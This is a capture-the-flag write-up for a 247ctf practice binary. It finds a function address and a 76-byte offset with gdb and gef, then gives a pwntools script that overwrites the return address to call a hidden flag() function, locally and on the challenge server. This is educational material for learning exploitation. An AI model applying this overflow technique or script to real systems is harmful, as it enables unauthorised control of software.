![ddcb5a5a1cceac2f48661f5a7bbc1985.png](621452062d74478d83b37c8a53a63256.png) Let's run it and see what we get ![b9727400a632351051e9842eece27e50.png](46b8f6ff51f84fccb089f2c56ad3610a.png) Just takes some input. Lets use **gdb** (with **gef**) to analyze the binary. First, find the function `info functions` ![c64b2a158a4b06d416f55536a7f5df04.png](ce40a315a501456b8cbe5ba23667f095.png) So the function we want is at `0x08048576` Next, find the offset 1. Create a pattern `pattern create 100` 2. Send that to the program by first running it with **r** Nice! We get a **segfault** ![24b8793fb9f7cd3ea645f0d1c84cd599.png](c6722ae3e7d541058fbf29bd69068451.png) **gdb** is telling us that the segfault is at `0x61616174`. Let's use that as our pattern search parameter to find the offset `pattern search 0x61616174` ![5136d287918a16a14b649dc59e7d80d3.png](eec12c0426fe4328870d4041da859783.png) There's our offset! **76** We can test this by using **pi** in **gef** and sending the output into the program. `pi print('A'*76 + 'B'*4)` ![9b9424712ed54c405caf261ebf9f933d.png](7d04c82e06d9464381202e72ebb1e1fb.png) If all goes well, it should fill the buffer with **41** and overwrite the instruction pointer with `0x424242` *(A = 41, B = 42)* ![911c20500bb29f3bdcdbf635c9de9477.png](8a131153f51f4597928701aeb0941815.png) Cool, so we control the instruction pointer now. Now that we know the **offset** and the **function address**, we can write an exploit. Here's my code: ```Python #importing the pwntools library from pwn import * #creating the process io = process('./hidden_flag_function') #creating the connection to the server #io = remote('1e9f746024b2e701.247ctf.com', 50254) #setting the padding and function location variables padding = b'A' * 76 funcloc = 0x08048576 #attaching the process to GDB for debugging gdb.attach(io) #recieving one line io.recvline() #sending the payload io.sendline(padding + p32(funcloc)) #recieving 3 lines print(io.recvline()) print(io.recvline()) print(io.recvline()) ``` ![5c1fdce0faeed3a1f324fb95b869c0a0.png](ed473bb5148743bd858fbed68d9cf671.png) Looks good! Looks like we called the `flag()` function which then called `fgets()` and it broke. Let's fire it at the service by uncommenting the `io = remote()` line, and commenting out the `gdb.attach(io)` and `io = process()` lines ![21f5ff54dd607ff2a97cb9b8aebbe7a5.png](fb41f06c46e24561b84c17bb0b31b7f0.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #buffer_overflow #exploit_development #pwn #scripting #gdb #gef Related: